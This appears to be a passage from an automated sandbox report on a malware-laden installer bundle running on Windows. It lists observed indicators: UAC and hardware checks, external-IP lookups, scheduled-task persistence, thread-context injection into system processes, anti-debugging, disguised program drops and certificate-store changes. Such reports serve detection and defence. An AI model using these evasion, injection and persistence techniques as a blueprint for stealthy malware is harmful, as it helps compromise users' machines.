Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\"" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\b5-d300e-bc3-cf6a9-a11571ea2a86b\SHulogelishi.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\C8CE.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\is-C4PRC.tmp\ultramediaburner.tmp N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\is-620S8.tmp\Sat19ba05e89ea6d406.tmp N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\mshta.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent BAFE08FA72E6EFCF c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\User_Feed_Synchronization-{4F246605-F333-40E5-8FE6-2ED3621ADF90} c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Time Trigger Task c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2559286294-2439613352-4032193287-1000 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\services64 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Azure-Update-Task c:\windows\system32\svchost.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\C8CE.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4400 set thread context of 4900 N/A C:\ProgramData\330255.exe C:\ProgramData\330255.exe
PID 2556 set thread context of 2736 N/A c:\windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 5692 set thread context of 456 N/A C:\ProgramData\7454952.exe C:\ProgramData\7454952.exe
PID 6924 set thread context of 6308 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 2228 set thread context of 228 N/A C:\Users\Admin\AppData\Local\Temp\4208.exe C:\Users\Admin\AppData\Local\Temp\4208.exe
PID 3024 set thread context of 4456 N/A C:\Users\Admin\AppData\Local\Temp\4208.exe C:\Users\Admin\AppData\Local\Temp\4208.exe
PID 3076 set thread context of 4572 N/A C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build2.exe C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build2.exe
PID 6092 set thread context of 6456 N/A C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build3.exe C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build3.exe
PID 6208 set thread context of 1088 N/A C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc\4208.exe C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc\4208.exe
PID 1720 set thread context of 5056 N/A C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc\4208.exe C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc\4208.exe
PID 4520 set thread context of 6120 N/A C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc\4208.exe C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc\4208.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Windows Media Player\VLAYMQWNQW\ultramediaburner.exe C:\Users\Admin\AppData\Local\Temp\is-QR3HM.tmp\46807GHF____.exe N/A
File created C:\Program Files (x86)\UltraMediaBurner\is-VD630.tmp C:\Users\Admin\AppData\Local\Temp\is-C4PRC.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-C4PRC.tmp\ultramediaburner.tmp N/A
File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-C4PRC.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\UltraMediaBurner\is-CR7KM.tmp C:\Users\Admin\AppData\Local\Temp\is-C4PRC.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-C4PRC.tmp\ultramediaburner.tmp N/A
File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-C4PRC.tmp\ultramediaburner.tmp N/A
File created C:\Program Files\Windows Media Player\VLAYMQWNQW\ultramediaburner.exe.config C:\Users\Admin\AppData\Local\Temp\is-QR3HM.tmp\46807GHF____.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\Tedisaeraja.exe C:\Users\Admin\AppData\Local\Temp\is-QR3HM.tmp\46807GHF____.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\Tedisaeraja.exe.config C:\Users\Admin\AppData\Local\Temp\is-QR3HM.tmp\46807GHF____.exe N/A
File created C:\Program Files (x86)\FarLabUninstaller\is-FUPSS.tmp C:\Users\Admin\AppData\Local\Temp\is-C4PRC.tmp\ultramediaburner.tmp N/A
File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe C:\Users\Admin\AppData\Local\Temp\is-C4PRC.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI94C9.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9F3E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA23F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA2EC.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA7B1.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File opened for modification C:\Windows\Installer\MSI7C85.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7D71.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9E23.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Installer\MSI9FCB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA0D6.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7E2F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI92B3.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9350.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9631.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f7578ea.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f7578ed.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\Explorer.EXE N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI96AF.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File opened for modification C:\Windows\Installer\MSI7AED.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7E7E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI93BE.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA192.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Installer\f7578ea.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7CE3.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7DA1.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\juubrcw N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\juubrcw N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\juubrcw N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19c6762a08beae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\juubrcw N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\juubrcw N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\juubrcw N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\juubrcw N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\juubrcw N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\juubrcw N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19c6762a08beae.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19c6762a08beae.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19e6a852f849bb2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19e6a852f849bb2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\b05c81bb-36fe-4dcd-92d7-87f04a0bb65c\build2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 C:\Windows\system32\msiexec.exe N/A
